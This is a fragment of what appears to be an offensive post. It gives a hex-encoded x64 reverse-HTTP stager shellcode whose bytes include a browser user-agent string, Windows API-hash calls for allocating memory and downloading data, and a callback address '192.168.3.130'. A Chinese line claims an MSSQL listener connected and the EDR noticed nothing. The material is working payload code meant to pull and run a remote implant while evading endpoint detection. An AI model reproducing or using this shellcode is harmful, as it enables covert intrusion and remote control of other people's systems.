5420362e313b20574f5736343b2054726964656e742f352e303b204d4154503b204d415450290d0a0
09043135b13347d9f7e656885fa95a8b8fc36ec75241d8fc5a4c7065535f614823146259414707e49
9c0b3eef2903cc777223dcf99d8e936aef3676a36360e860b68f0848b40ca503440a4cb13699e6e03
cc7cc057418491a6139d958e0bddd743a24e691a4fd70ccd2cf20766347e15b32348705136e4dd721
29dcf65b4a0572dffbe7d627046a18c88d554943aee8468535430a1f830420ba1097e4363a0aac770
74286177353733f0e0b5ad06a03d63959af8fa151a3b845a182260e9da701e7765e42b94b144cc827
ec8b7a580041bef0b5a256ffd54831c9ba0000400041b80010000041b94000000041ba58a453e5ffd
5489353534889e74889f14889da41b8002000004989f941ba129689e2ffd54883c42085c074b6668b
074801c385c075d758585848050000000050c3e89ffdffff3139322e3136382e332e313330003ade6
8b1'
MSSQL 监听成功,EDR 未发现任何异常行为
